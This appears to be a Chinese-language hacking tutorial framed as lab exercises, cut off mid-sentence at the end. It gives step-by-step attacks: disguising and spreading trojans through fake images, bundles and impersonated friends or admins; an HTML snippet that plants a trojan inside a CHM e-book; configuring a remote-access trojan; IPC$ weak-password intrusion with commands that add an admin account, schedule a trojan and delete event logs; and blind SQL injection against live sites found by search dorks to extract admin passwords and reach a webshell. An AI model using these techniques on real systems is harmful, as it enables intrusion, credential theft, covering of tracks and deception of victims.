誘惑別人，像“最新火辣辣小電影！”、“CuteFTP5.0完全解密版?。?！”等。在安裝了這個(gè)CuteFTP之后，你的機(jī)器就被“完全解密”了。那些喜歡免費(fèi)軟件的朋友們要小心了！鑒于木馬的危害性，很多人對(duì)木馬知識(shí)還是有一定了解的，這對(duì)木馬的傳播起了一定的抑制作用，這是木馬設(shè)計(jì)者所不愿見(jiàn)到的，因此他們開(kāi)發(fā)了多種功能來(lái)偽裝木馬，以達(dá)到降低用戶警覺(jué)，欺騙用戶的目的。介紹幾種常見(jiàn)的偽裝植入木馬的方法：1．直接發(fā)送式欺騙將木馬服務(wù)端程序更改圖標(biāo)，如設(shè)為圖片圖標(biāo)，可將其擴(kuò)展名設(shè)置為***.jpg.exe格式，直接發(fā)給對(duì)方，由于Windows的默認(rèn)設(shè)置是隱藏已知文件的擴(kuò)展名，所以對(duì)方收到后就會(huì)輕易相信這就是一幅圖片。對(duì)方運(yùn)行后，結(jié)果毫無(wú)反應(yīng)（運(yùn)行木馬后的典型表現(xiàn)），對(duì)方說(shuō)：“怎么打不開(kāi)呀!”，回答：“哎呀，不會(huì)程序是壞了吧?”，或者說(shuō)：“對(duì)不起，我發(fā)錯(cuò)了!”，然后把正確的東西（正常游戲、圖片等）發(fā)給對(duì)方，他收到后只顧高興就不想剛才為什么會(huì)出現(xiàn)那種情況了。2．捆綁欺騙把木馬服務(wù)端和某個(gè)游戲或工具捆綁成一個(gè)文件在QQ或郵件中發(fā)給別人，別人運(yùn)行后它們往往躲藏在Windows的系統(tǒng)目錄下，圖標(biāo)偽裝成一個(gè)文本文件或者網(wǎng)頁(yè)文件，通過(guò)端口與外界進(jìn)行聯(lián)系。然后把自己和一些EXE文件捆綁在一起，或者采用改變文件關(guān)聯(lián)方式的方法來(lái)達(dá)到自啟動(dòng)的目的。而且，即使以后系統(tǒng)重裝了，如果該程序他還是保存著的話，還是有可能再次中招的。3．文件夾慣性點(diǎn)擊把木馬文件偽裝成文件夾圖標(biāo)后，放在一個(gè)文件夾中，然后在外面再套三四個(gè)空文件夾，很多人出于連續(xù)點(diǎn)擊的習(xí)慣，點(diǎn)到那個(gè)偽裝成文件夾的木馬時(shí)，也會(huì)收不住鼠標(biāo)點(diǎn)下去，這樣木馬就成功運(yùn)行了。4．危險(xiǎn)下載點(diǎn)攻破一些下載站點(diǎn)后，下載幾個(gè)下載量大的軟件，捆綁上木馬，再悄悄放回去讓別人下載，這樣以后每增加一次下載次數(shù)，就等于多了一臺(tái)中木馬的計(jì)算機(jī)?；蛘甙涯抉R捆綁到其他軟件上，然后“正大光明”地發(fā)布到各大軟件下載網(wǎng)站，它們也不查毒，就算查也查不出一些新木馬。5．郵件冒名欺騙該類木馬植入的前提是，用匿名郵件工具冒充好友或大型網(wǎng)站、機(jī)構(gòu)、單位向別人發(fā)木馬附件，別人下載附件并運(yùn)行的話就中木馬了。如冒充單位的系統(tǒng)管理員，向各個(gè)客戶端發(fā)送系統(tǒng)補(bǔ)丁或是其它安裝程序。6．QQ冒名欺騙該類木馬植入的前提是，必須先擁有一個(gè)不屬于自己的QQ號(hào)。然后使用這個(gè)QQ號(hào)碼給好友們發(fā)去木馬程序，由于信任被盜號(hào)碼的主人，好友們會(huì)毫不猶豫地運(yùn)行木馬程序，結(jié)果就中招了。7．ZIP偽裝將一個(gè)木馬和一個(gè)損壞的ZIP包（可自制）捆綁在一起，然后指定捆綁后的文件為ZIP圖標(biāo)，這樣一來(lái)，除非別人看了他的后綴，否則點(diǎn)下去將和一般損壞的ZIP沒(méi)什么兩樣，根本不知道其實(shí)已經(jīng)有木馬在悄悄運(yùn)行了。ZIP偽裝的常見(jiàn)做法如下：首先創(chuàng)建一個(gè)文本文檔，輸入任意個(gè)字節(jié)（其實(shí)一個(gè)就行，最小）將它的后綴txt直接改名為zip即可，然后把它和木馬程序捆在一起，修改捆綁后的文件圖標(biāo)為zip圖標(biāo)就成了。8.論壇上發(fā)鏈接在可以上傳附件的論壇上傳捆綁好的木馬（如將木馬捆綁在圖片上傳），然后把鏈接發(fā)給想要攻擊的目標(biāo)肉機(jī)的主人，誘惑他點(diǎn)擊那個(gè)鏈接。10.網(wǎng)頁(yè)木馬法在自己的網(wǎng)頁(yè)上捆綁木馬，再在QQ上邀請(qǐng)想要攻擊的目標(biāo)網(wǎng)友去訪問(wèn)，輕松給他種上你配置的木馬。二、chm木馬的制作需要下載和安裝一個(gè)QuickCHM軟件，并且準(zhǔn)備一個(gè)chm電子書以及一個(gè)木馬。（一）、chm電子書的制作安裝QuickCHM文件。事先準(zhǔn)備好要制作成CHM文件的文本文件。如下圖，我們是放在C\test文件夾下。下面看如何制作CHM文件。CHM文件制作過(guò)程：利用QuickCHM2.6向?qū)нM(jìn)行制作操作打開(kāi)QUICKCHM2.6軟件，選擇文件菜單下CHM向?qū)?。在向?qū)гO(shè)置框中設(shè)置項(xiàng)目參數(shù)選擇項(xiàng)目文件夾為文本文件的文件夾，如C:\test設(shè)置完參數(shù)后點(diǎn)擊下一步。調(diào)整文件文件之間的先后順序，調(diào)整后點(diǎn)擊下一步。設(shè)置主題及標(biāo)題如圖，我在標(biāo)題中寫上標(biāo)題“菜譜”設(shè)置完成后點(diǎn)擊完成編譯文本文件。點(diǎn)擊圖標(biāo)菜單中綠色的三角箭頭，如下圖。提示編譯進(jìn)度編譯完成：打開(kāi)設(shè)置目錄，我們可以看到，新制作出來(lái)的CMH文件。打開(kāi)查看一下，可以看到，如下圖界面。制作完成。（二）、chm木馬的制作1.編寫一個(gè)小小的網(wǎng)頁(yè)代碼，<html><head><metahttp-equiv="refresh"content="3:url='網(wǎng)頁(yè)文件名.htm'"></head><body><objectwidth=0height=0style="display:none;"type="application/x-oleobject"codebase="木馬.exe"></object>chm木馬 </body></html>生成網(wǎng)頁(yè)文件名.htm。codebase="木馬.exe"，codebase后面即是木馬文件。將其保存為.html類型的文件，本例保存為：aaa.html2.接下來(lái)對(duì)CHM電子書進(jìn)行反編譯，運(yùn)行QuickCHM軟件，選擇“文件”→“反編譯”菜單項(xiàng)。3.在彈出的【反編譯】對(duì)話框中選擇“輸入”和“輸出”文件夾，“輸入”框選擇電子書路徑，“輸出”框選擇反編譯后的文件存儲(chǔ)路徑（一定要選擇已存在的文件夾路徑），然后點(diǎn)擊“確定”即可自動(dòng)反編譯。4.反編譯完成后會(huì)彈出反編譯文件夾，找到其中后綴名為.hhp的文件，也就是和電子書名稱相同的那個(gè)文件。本例中是“電子書.hhp”。5.用記事本打開(kāi).hhp文件，在文件末尾添加我們前面編寫的網(wǎng)頁(yè)文件名和木馬名。6.將前面編寫的網(wǎng)頁(yè)文件（aaa.html）和木馬文件（木馬.exe）復(fù)制到反編譯后的文件夾中。7.此時(shí)需要重新編譯。再次運(yùn)行QuickCHM軟件，選擇“文件”→“打開(kāi)”菜單項(xiàng)，彈出【打開(kāi)】對(duì)話框，選擇剛剛修改過(guò)的“電子書.hhp”文件，點(diǎn)擊“打開(kāi)”，回到QuickCHM軟件主窗口。8.選擇“文件”→“編譯”，稍等片刻編譯完成，彈出對(duì)話框中會(huì)顯示“完成！你希望運(yùn)行嗎？”的字樣，選擇“否”按鈕，此時(shí)，已完成了一個(gè)chm電子書木馬的制作，生成的電子書木馬在“反編譯文件夾”內(nèi)。9.可通過(guò)比較前后兩次的文件大小，判斷是否成功。10.此時(shí)運(yùn)行chm就會(huì)運(yùn)行木馬。三、“廣外男生”木馬的使用客戶端模仿Windows資源管理器：除了全面支持訪問(wèn)遠(yuǎn)程服務(wù)器文件系統(tǒng)，也同時(shí)支持通過(guò)對(duì)方的“網(wǎng)上鄰居”，訪問(wèn)對(duì)方內(nèi)部網(wǎng)其他機(jī)器運(yùn)用了“反彈窗口”技術(shù)使用了“線程插入”技術(shù)：服務(wù)器運(yùn)行時(shí)沒(méi)有進(jìn)程，所有網(wǎng)絡(luò)操作均插入到其他應(yīng)用程序的進(jìn)程中完成。即便受控端安裝的防火墻有“應(yīng)用程序訪問(wèn)權(quán)限”的功能，也不能對(duì)廣外男生的服務(wù)器進(jìn)行有效警告和攔截。1.下載廣外男生木馬軟件。2.利用客戶端程序配置出服務(wù)端程序。服務(wù)端常規(guī)設(shè)置：EXE文件名：您的服務(wù)端運(yùn)行后拷貝到系統(tǒng)目錄中的EXE文件名。DLL文件名：您的服務(wù)端運(yùn)行后拷貝到系統(tǒng)目錄中的DLL文件名。注冊(cè)表啟動(dòng)項(xiàng)：服務(wù)端在注冊(cè)表中的自啟動(dòng)項(xiàng)目的名稱。服務(wù)端網(wǎng)絡(luò)設(shè)置：HTTP網(wǎng)頁(yè)形式IP通知：您的服務(wù)端將會(huì)每隔一段時(shí)間從您所設(shè)置的HTTP網(wǎng)頁(yè)地址中讀取一次您的IP地址和端口。請(qǐng)您在“HTTP網(wǎng)頁(yè)地址”中設(shè)置好您的主頁(yè)上的IP文件地址靜態(tài)IP：您的服務(wù)端運(yùn)行后將直接連接到您設(shè)置的IP地址和端口號(hào)，這種設(shè)置適合于客戶端是固定IP和服務(wù)端和客戶端處于同一局域網(wǎng)并且IP地址相對(duì)靜止的用戶。生成文件：保存文件：就是您的服務(wù)端生成的路徑，將要寫入的文件。保存設(shè)置：如果您想把該次的設(shè)置保存下來(lái)，您可以選“保存設(shè)置”并存成相應(yīng)的文件，下次只要導(dǎo)入該文件就可以輕松生成服務(wù)端了。3.設(shè)置客戶端客戶端的網(wǎng)絡(luò)設(shè)置頁(yè)面：

客戶端最大連接數(shù)：由于使用者操作系統(tǒng)各有所異，如果使用WIN9X的用戶本地是不能創(chuàng)建超過(guò)一定數(shù)目的SOCKET，因此，9X的用戶請(qǐng)把該數(shù)字保持在30左右。WINNT，2K，XP的用戶可以把該數(shù)字設(shè)大點(diǎn)也沒(méi)有影響。

客戶端使用端口：就是服務(wù)端反彈連接時(shí)使用的遠(yuǎn)程端口，最好是設(shè)置為80，這樣更容易突破服務(wù)端的TCP過(guò)濾。如果您的80號(hào)端口被占用了，可以在此設(shè)置另一個(gè)使用端口。

IP地址段的過(guò)濾：有時(shí)候不想讓某個(gè)網(wǎng)段的機(jī)器訪問(wèn)或只想讓某個(gè)網(wǎng)段的機(jī)器連接您的客戶段的話，可以在這里輸入起止IP段。服務(wù)端的連接類型：HTTP網(wǎng)頁(yè)連接：就是把客戶端的IP以及開(kāi)放端口寫到一個(gè)HTM文件中，再把它上傳到HTTP服務(wù)器上，服務(wù)端每隔一個(gè)時(shí)間就讀取一次該網(wǎng)頁(yè)的內(nèi)容，從中還原客戶端的IP地址和端口，再進(jìn)行連接，該種連接方式適合于動(dòng)態(tài)IP用戶。靜態(tài)IP連接：就是指客戶端的IP地址是固定的，服務(wù)端隨時(shí)都可以連到該機(jī)器上，這種連接方式適合兩臺(tái)機(jī)器在同一局域網(wǎng)或客戶端IP固定的用戶。4.發(fā)布服務(wù)端，進(jìn)行遠(yuǎn)程控制。

廣外男生隱藏了服務(wù)端，只有運(yùn)行服務(wù)端時(shí)，服務(wù)端的進(jìn)程會(huì)短時(shí)暴露在任務(wù)管理器下，不過(guò)是一閃而過(guò)，它運(yùn)用了DLL注入到遠(yuǎn)程進(jìn)程里面，利用dll插入線程寄生到Windows系統(tǒng)進(jìn)程(如explorer)中，本身沒(méi)有單獨(dú)進(jìn)程，復(fù)制自身到system32目錄下，在HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run中添加自己，復(fù)制寄生到進(jìn)程的一個(gè)DLL到system32目錄下，隨機(jī)寫入注冊(cè)表，位置不固定，重啟之后隨系統(tǒng)進(jìn)程啟動(dòng)自身。5.在網(wǎng)上搜索如何卸載廣外男生。

windows漏洞利用實(shí)驗(yàn)?zāi)康模荷钊肓私庀到y(tǒng)弱口令和IPC共享的原理；利用系統(tǒng)弱口令和IPC共享進(jìn)行攻擊。實(shí)驗(yàn)步驟：利用軟件掃描IP，發(fā)現(xiàn)IP的IPC弱口令漏洞，Administrator的密碼為空，則可以進(jìn)行IPC連接，接著在CMD中輸入空連接命令：netuse\\肉雞IP\ipc$""/user:"Administrator"屏幕會(huì)提示"命令成功完成"。如果Administrator的密碼不為空，在CMD中輸入空連接命令：netuse\\肉雞IP\IPC$"密碼"/user:"Administrator"現(xiàn)在我們就已經(jīng)進(jìn)入了這臺(tái)主機(jī)。在這臺(tái)主機(jī)上建立一個(gè)屬于自己的帳號(hào)，輸入命令如下：netuserabc123/add這句命令的意義為在遠(yuǎn)程主機(jī)中加入一個(gè)名叫abc密碼為123的用戶。當(dāng)屏幕提示命令成功完成后再輸入：netlocalgroupAdministratorsabc/add這句命令的意義就是為了把a(bǔ)bc這個(gè)用戶加入Administrator組，接著輸入：netstarttelnet過(guò)一會(huì)當(dāng)屏幕提示命令成功完成時(shí)，至此我們已經(jīng)成功的入侵了一臺(tái)主機(jī)，并且設(shè)立了屬于自己的帳號(hào)。給主機(jī)種下一個(gè)木馬，讓我們能更好的控制這臺(tái)肉雞：輸入nettime\\IP

這時(shí)屏幕上會(huì)顯示一個(gè)時(shí)間，這就是主機(jī)的時(shí)間，假設(shè)此時(shí)主機(jī)的時(shí)間為5:10，那么我們就再輸入：

copyqq.exe\\IP\admin$\qq.exe

此步命令就是把本機(jī)上的qq.exe(木馬)傳到主機(jī)的admin$文件夾，并命名為qq.exe。這時(shí)，我們已經(jīng)成功的將木馬傳到了主機(jī)上。如何啟動(dòng)木馬：在上面我們已經(jīng)看到主機(jī)的時(shí)間為5:10，輸入：at\\IP5:13qq.exe如果屏幕此時(shí)出現(xiàn)已經(jīng)成功加入一個(gè)作業(yè)ID那就算完成了木馬的啟動(dòng)了，此命令的具體含義為將qq.exe設(shè)為主機(jī)的5:13分啟動(dòng)。這時(shí)候我們就需要另一個(gè)軟件灰鴿子。打開(kāi)灰鴿子，點(diǎn)擊"增加主機(jī)"，輸入剛才的IP地址，輸入配置服務(wù)端的連接密碼，點(diǎn)接"確定"，便會(huì)發(fā)現(xiàn)主機(jī)已經(jīng)增加完畢，過(guò)一分鐘左右，估計(jì)主機(jī)已經(jīng)到了5:13后，便進(jìn)行主機(jī)連接，此時(shí)便會(huì)發(fā)現(xiàn)我們已經(jīng)順利的進(jìn)入了目標(biāo)主機(jī)，他的全部文件都會(huì)顯示在我們?cè)诿媲啊?/p>

如果主機(jī)已經(jīng)開(kāi)了139端口，那我們便可以進(jìn)入映射磁盤了，在灰鴿子的遠(yuǎn)程命令中將對(duì)方的磁盤全部設(shè)為共享，接著在CMD中輸入如下命令netusez:\\IP\c$此命令的意義為把對(duì)方的C盤映射為本地的Z盤。這時(shí)候打開(kāi)我的電腦便看到了這個(gè)映射在遠(yuǎn)程的網(wǎng)絡(luò)磁盤，更方便了我們控制遠(yuǎn)程機(jī)器。隱藏自己：在CMD中輸入netuse\\IP\ipc$/delte這是退出語(yǔ)句，接著在灰鴿子中找到如下文件全部刪除你的入侵日志：delC:\winnt\system32\logfiles\*.*delC:\winnt\ssytem32\config\*.evtdelC:\winnt\system32\dtclog\*.*delC:\winnt\system32\*.logdelC:\winnt\system32\*.txtdelC:\winnt\*.txtdelC:\winnt\*.log

SQL注入實(shí)驗(yàn)?zāi)康?1.理解SQL注入的原理。2.掌握常用的SQL注入的方法。3.熟練掌握典型SQL注入工具的使用。4.了解SQL注入的防御。實(shí)驗(yàn)設(shè)備:連入Internet的PC機(jī)一臺(tái)所用軟件：各種典型的SQL注入軟件、IE一、SQL注入（SQL

Injection）準(zhǔn)備1、手工查找SQL注入點(diǎn)（1）IE菜單=>工具=>Internet選項(xiàng)=>高級(jí)=>顯示友好HTTP錯(cuò)誤信息前面的勾去掉。（2）用google高級(jí)搜索，查找關(guān)鍵詞為“asp?id=”，關(guān)鍵字所在位置選擇“網(wǎng)站的網(wǎng)址”，查找asp網(wǎng)站，如果查找php語(yǔ)言網(wǎng)站，將關(guān)鍵詞改為“php?id=”即可。（3）在查找結(jié)果中，選擇一個(gè)網(wǎng)站，如/show.asp?id=49，在該地址后面加單引號(hào)，回車，若服務(wù)器返回類似以下錯(cuò)誤，則表明該網(wǎng)站存在可能的注入點(diǎn)。MicrosoftJETDatabaseEngine錯(cuò)誤'80040e14'語(yǔ)法錯(cuò)誤(操作符丟失)在查詢表達(dá)式'log_id=49'''中。/showlog.asp，行128（4）為了進(jìn)一步驗(yàn)證該網(wǎng)站是否存在注入點(diǎn)，在使用1=1和1=2來(lái)進(jìn)行測(cè)試。and1=1返回正常頁(yè)面and1=2返回錯(cuò)誤頁(yè)面此時(shí)得到SQL注入點(diǎn)。2、判斷數(shù)據(jù)庫(kù)類型方法一：利用數(shù)據(jù)庫(kù)服務(wù)器的系統(tǒng)變量進(jìn)行區(qū)分步驟：在注入點(diǎn)后面加入anduser>0若返回類似MicrosoftOLEDBProviderforODBCDrivers錯(cuò)誤'70040e07'的提示，可判斷出是SQL數(shù)據(jù)庫(kù)。若返回類似MicrosoftOLEDBProviderforODBCDrivers錯(cuò)誤'70040e10'[Microsoft][ODBCMicrosoftAccessDriver]參數(shù)不足，期待是1的提示，可判斷出是Access數(shù)據(jù)庫(kù)。方法二：利用系統(tǒng)表兩次分別輸入/show.asp?id=49and(selectcount(*)fromsysobjects)>0/show.asp?id=49and(selectcount(*)frommsysobjects)>0若第一個(gè)網(wǎng)址顯示基本正常，第二個(gè)異常，則是SQLServer數(shù)據(jù)庫(kù)；若兩個(gè)都異常，則是Access數(shù)據(jù)庫(kù)。方法三：根據(jù)網(wǎng)站返回的錯(cuò)誤信息返回信息中包含MicrosoftOLEDBProviderforSQLServer錯(cuò)誤'70040e14'，則表明該網(wǎng)站使用了SQL數(shù)據(jù)庫(kù)。返回信息中包含類似MicrosoftJETDatabaseEngine錯(cuò)誤'70040e14'，則表明該網(wǎng)站使用了Access數(shù)據(jù)庫(kù)。返回信息中包含MicrosoftOLEDBProviderforODBCDrivers錯(cuò)誤'70040e14'，則可能為SQL數(shù)據(jù)庫(kù)，也可能是Access數(shù)據(jù)庫(kù)。如返回信息類似MicrosoftOLEDBProviderforODBCDrivers錯(cuò)誤'70040e14'[Microsoft][ODBCSQLServerDriver][SQLServer]字符串”2’之后有未閉合的引號(hào)/bbs/login.asp,行52則可確定是SQL數(shù)據(jù)庫(kù)如返回信息類似MicrosoftOLEDBProviderforODBCDrivers錯(cuò)誤'70040e14'[Microsoft][ODBCMicrosoftAccessDriver]字符串的語(yǔ)法錯(cuò)誤，在查詢表達(dá)式”user_id=001’/bbs/admin.asp,行46則說(shuō)明數(shù)據(jù)采用OLEDB驅(qū)動(dòng)且使用Access數(shù)據(jù)庫(kù)。二、判斷表、字段及字段長(zhǎng)度實(shí)驗(yàn)步驟中所出現(xiàn)的紅色標(biāo)識(shí)部分均表示利用上一步所得到的相應(yīng)的結(jié)果。尋找注入點(diǎn)。用上次實(shí)驗(yàn)所使用的“’”和“and1=1”，“and1=2”尋找注入點(diǎn)。如/showlog.asp?cat_id=27&log_id=10138判斷表是否存在。用andexists(select*fromtablename)進(jìn)行判斷表的存在。在注入點(diǎn)后面緊跟andexists(select*fromtablename)即可。如/showlog.asp?cat_id=27&log_id=10138andexists(select*fromadmin)若返回正常頁(yè)面，則表示存在admin表。若返回MicrosoftJETDatabaseEngine錯(cuò)誤'80040e14'語(yǔ)法錯(cuò)誤。在查詢表達(dá)式'log_id=10138andexists(select*fromuser)'中。/showlog.asp，行128則表示不存在user表。然后繼續(xù)判斷其他表是否存在。常用表名可以參考國(guó)內(nèi)常見(jiàn)程序的表名，比如：adminuservotemanageusers會(huì)員用戶管理員admin_adminuserinfobbsnewssystem等。判斷表的字段是否存在。使用andexists(selectidfromtablename)(id指字段名稱)判斷字段是否存在。在注入點(diǎn)后面緊跟andexists(selectidfromtablename)即可。如/showlog.asp?cat_id=27&log_id=10138andexists(selectadmin_idfromadmin)若返回正常頁(yè)面則存在該字段；否則返回類似一下的錯(cuò)誤信息。MicrosoftJETDatabaseEngine錯(cuò)誤'80040e10'至少一個(gè)參數(shù)沒(méi)有被指定值。/showlog.asp，行128在判斷字段的時(shí)候，可以順便猜一下管理員的id值，一般都是id=1，如果不是，就繼續(xù)猜id=2,id=3,……判斷編號(hào)所用語(yǔ)句為andexists(selectidfromtablenamewhereid=n)在注入點(diǎn)后面緊跟andexists(selectidfromtablenamewhereid=n)即可。如/showlog.asp?cat_id=27&log_id=10138andexists(selectadmin_idfromadminwhereid=1)若返回正常頁(yè)面則存在該字段；否則返回錯(cuò)誤信息，類似“該篇日志文章不存在，或已被刪除”。4、判斷各字段長(zhǎng)度。使用andexists(selectuseridfromtablenamewherelen(userid)<m[anduserid=n])(m和n都是數(shù)值)進(jìn)行判斷。在注入點(diǎn)后面緊跟andexists(selectuseridfromtablenamewherelen(userid)<m[anduserid=n])即可。常用的方法，判斷的時(shí)候大于小于一起用，使用二分法，比如說(shuō)你判斷>4而又判斷<12那我接下來(lái)就取中間的看是大于8還是小于8，如果是大于8則說(shuō)明在8到12之間，如果是小于8說(shuō)明在4到8之間，再接著用二分法判斷下去。。。。。。如：/showlog.asp?cat_id=27&log_id=10138andexists(selectadmin_idfromadminwherelen(admin_id)>10andid=1)若返回結(jié)果正常，則說(shuō)明該字段長(zhǎng)度大于10；若返回結(jié)果錯(cuò)誤，則說(shuō)明字段長(zhǎng)度小于10。通過(guò)二分法判斷下去，最后通過(guò)andexists(selectuseridfromtablenamewherelen(userid)=m[anduserid=n])來(lái)確定最終長(zhǎng)度。如/showlog.asp?cat_id=27&log_id=10138andexists(selectadmin_idfromadminwherelen(admin_id)=6)三、猜解賬號(hào)和密碼練習(xí)asc和mid函數(shù)asc函數(shù)的作用是獲取ascii。mid函數(shù)的作用是取字符，格式為mid（字符串，起始位置，取值長(zhǎng)度），如mid（xyz，2,1）表示對(duì)xyz從第二位開(kāi)始取，取1個(gè)字符，即取y。猜解賬號(hào)andexists(selectusernamefromtablenamewhere[id=nand]asc(mid(username,1,1))>m)Username為上次實(shí)驗(yàn)所判斷出的用戶名字段名；Tablename為上次實(shí)驗(yàn)所判斷出的表名。m表示為一個(gè)數(shù)值，即判斷某個(gè)字符的ascii是否大于該值。漢字的ascii是小于0的。A的ascii為65，a為97,0為48，也可借助ascii轉(zhuǎn)換軟件進(jìn)行轉(zhuǎn)換。將該語(yǔ)句直接連接到注入點(diǎn)之后，回車即可，若返回正常頁(yè)面，表示大于m，否則小于m，該處繼續(xù)使用二分法進(jìn)行判斷。如：/showlog.asp?cat_id=x&log_id=xandexists(selectadmin_idfromadminwhereid=1andasc(mid(admin_id,1,1))>97)返回正常頁(yè)面，說(shuō)明第一個(gè)是小寫字母。/showlog.asp?cat_id=x&log_id=xandexists(selectadmin_idfromadminwhereid=1andasc(mid(admin_id,1,1))>110)返回錯(cuò)誤，說(shuō)明第一個(gè)字符的ascii值小于110/showlog.asp?cat_id=x&log_id=xandexists(selectadmin_idfromadminwhereid=1andasc(mid(admin_id,1,1))=100)返回正確，說(shuō)明第一個(gè)字符的ascii值等于100，轉(zhuǎn)換后對(duì)應(yīng)字符d按照此方法繼續(xù)判斷其他字符。猜解密碼andexists(selectpasswordfromtablenamewhereasc(mid(password,1,1))>m)Password為上次實(shí)驗(yàn)所判斷的密碼字段名。使用方法也是直接連接到注入點(diǎn)后，回車即可。如：/showlog.asp?cat_id=x&log_id=xandexists(selectidfromadminwhereasc(mid(id,1,1))<48)返回錯(cuò)誤，說(shuō)明大于48/showlog.asp?cat_id=x&log_id=xandexists(selectidfromadminwhereasc(mid(id,1,1))<50)返回正常頁(yè)面，說(shuō)明小于50/showlog.asp?cat_id=x&log_id=xandexists(selectidfromadminwhereasc(mid(id,1,1))=49)返回正常頁(yè)面，說(shuō)明等于49，對(duì)應(yīng)字符是數(shù)字1一般遇到16位或者32位的密碼，可能為MD5加密，可以利用MD5在線破解，當(dāng)然可以暴力破解。四、幾種常見(jiàn)注入工具的綜合使用目前幾種常見(jiàn)的工具有啊D注入工具、明小子、教主、NBSI、小榕哥的注入工具，下面簡(jiǎn)單介紹幾種工具的使用。1.啊D注入工具：該工具相對(duì)而言比較突出的功能是掃描注入點(diǎn)、SQL注入、后臺(tái)和列目錄。（1）從網(wǎng)上下載啊D注入工具。（2）利用“掃描注入點(diǎn)”，掃描網(wǎng)站的注入點(diǎn)。（3）復(fù)制任一注入點(diǎn)，利用“SQL注入檢測(cè)”，檢測(cè)其表名、字段、字段內(nèi)容。查看用戶權(quán)限，看是否能進(jìn)行列目錄。（4）利用“管理入口檢測(cè)”，檢測(cè)入口，利用賬號(hào)和密碼進(jìn)入管理后臺(tái)。2.明小子:該工具相對(duì)而言比較突出的功能是旁注。（1）掃描注入點(diǎn)方法一：①?gòu)木W(wǎng)上下載Web旁注工具Domain。②單擊“旁注檢測(cè)”，在“輸入域名”輸入網(wǎng)站地址，單擊“轉(zhuǎn)換域名”按鈕，即可看到其對(duì)應(yīng)的IP地址。③單擊“查詢”按鈕，即可將IP相同的網(wǎng)址搜索出來(lái)，并顯示在左邊的區(qū)域中.④在其中雙擊要檢測(cè)的網(wǎng)站，即可進(jìn)行注入點(diǎn)檢測(cè)。如果存在注入點(diǎn)，則會(huì)將其顯示在下面的“注入點(diǎn)”列表框中。⑤右擊要注入的網(wǎng)址，選擇“注入檢測(cè)”，進(jìn)入“注入檢測(cè)窗口”。方法二：①?gòu)木W(wǎng)上下載Web旁注工具Domain。②單擊“旁注檢測(cè)”，在“當(dāng)前路徑”中輸入網(wǎng)址，點(diǎn)擊“連接”按鈕，即可開(kāi)始掃描注入點(diǎn)。如果存在注入點(diǎn)，則會(huì)將其顯示在下面的“注入點(diǎn)”列表框中。③右擊要注入的網(wǎng)址，選擇“注入檢測(cè)”，進(jìn)入“注入檢測(cè)窗口”。（2）、猜解數(shù)據(jù)表、字段、字段內(nèi)容此時(shí)進(jìn)入了“SQL注入模塊”，進(jìn)行猜解數(shù)據(jù)表、字段、字段內(nèi)容。（3）、掃描后臺(tái)切換到“管理入口掃描”，在“注入點(diǎn)”文本框中輸入要檢測(cè)的地址，單擊“掃描后臺(tái)地址”按鈕即可。如果存在，則會(huì)出現(xiàn)在下面的列表中。（4）、登錄后臺(tái)（5）、熟悉其他功能模塊3.教主：該工具相對(duì)而言比較突出的功能是執(zhí)行命令、開(kāi)3389。4.NBSI：該工具相對(duì)而言比較突出的功能是php注入、命令，該工具是綜合性的，但耗cpu比較大。（1）從網(wǎng)上下載NBSI注入工具。（2）單擊“網(wǎng)站掃描”，在“注入地址”輸入網(wǎng)站地址，單擊“快速掃描”，進(jìn)行掃描。（3）在“掃描結(jié)果”中單擊要注入的網(wǎng)址，即可將其添加到下面的“注入地址”文本框。（4）單擊“注入分析”，在其中選擇GET單選按鈕，單擊“檢測(cè)”按鈕。（5）進(jìn)行表名和列名的猜解。（6）選擇要猜解列名前的復(fù)選框，單擊“猜解記錄”，得到該列詳細(xì)信息。（7）在主窗口中單擊“掃描及工具”按鈕，將“可能性：較高”的網(wǎng)址復(fù)制到“掃描地址”文本框中，并選擇“由根目錄開(kāi)始掃描”，進(jìn)行開(kāi)始掃描后臺(tái)。（8）選擇后臺(tái)，利用猜解到的賬號(hào)和密碼進(jìn)入后臺(tái)進(jìn)行管理。5.小榕哥的注入工具wis&wed是一個(gè)綜合工具，其中wis是注入點(diǎn)掃描和后臺(tái)掃描工具，wed是猜解用戶名和密碼的工具。（1）下載小榕wis&wed工具，該綜合工具也可分別下載。（2）打開(kāi)命令窗口，將根目錄切換為wis&wed所在目錄。（3）在命令行輸入wis/(即網(wǎng)址，“/”一定不能省略)，在掃描結(jié)果中，可以看到以亮綠色顯示的注入點(diǎn)。如圖1所示。圖1（4）在命令行下輸入wed注入點(diǎn)，猜解用戶名和密碼，此時(shí)wed將打開(kāi)三個(gè)字典文件，如圖2所示。并猜解得到用戶名和密碼，如圖3所示。圖2圖3（5）再次利用wis，這次進(jìn)行后臺(tái)地址掃描。在命令行輸入wis//A，進(jìn)行后臺(tái)掃描。（6）登錄后臺(tái)。實(shí)驗(yàn)注意事項(xiàng)：本實(shí)驗(yàn)請(qǐng)配合啊D或其他工具共同學(xué)習(xí)，如果該工具猜解不出表名，注意查看wis&wed文件夾中的表字典中是否存在該表，可以通過(guò)向表字典中添加或刪除常用表名來(lái)進(jìn)行理解實(shí)驗(yàn)原理。五、注入入侵的思路1、ACC的數(shù)據(jù)庫(kù)猜解表名猜解字段找后臺(tái)進(jìn)后臺(tái)找上傳2、Sql的數(shù)據(jù)庫(kù)如果低權(quán)限，按ACC方法PS：有些表名和字段可通過(guò)提交特殊字符回顯得到差異備份DB權(quán)限備份Log備份執(zhí)行命令添加用戶開(kāi)3389直接連接服務(wù)器SA權(quán)限列目錄找到Web目錄上傳寫入一句話木馬寫入小馬再寫大馬拿到webshell用webshell上傳文件進(jìn)行刺探相關(guān)信息上傳反彈木馬通過(guò)執(zhí)行命令來(lái)啟動(dòng)木馬3、DB權(quán)限時(shí)的思路及備份原理剖析（1）按照常規(guī)方法（通用法）猜解表名→猜解字段→猜解內(nèi)容→尋找后臺(tái)→進(jìn)入后臺(tái)→找上傳頁(yè)面→上傳木馬→得SHell↓得SHell←通過(guò)上傳工具←抓COOKIE←抓包↓通過(guò)NC上傳↓得SHell（2）備份①完全備份備份全部選中的文件夾，并不依賴文件的存檔屬性來(lái)確定備份那些文件。②差異備份差異備份是針對(duì)完全備份：備份上一次的完全備份后發(fā)生變化的所有文件。③增量備份增量備份是針對(duì)于上一次備份（無(wú)論是哪種備份）：備份上一次備份后，所有發(fā)生變化的文件。④Log備份導(dǎo)出日志文件到web目錄來(lái)獲得shell，LOG備份得到的WEBSHELL文件小，大大增加了成功率。首先得到數(shù)據(jù)庫(kù)的文件目錄，然后備份數(shù)據(jù)庫(kù)/*示例--備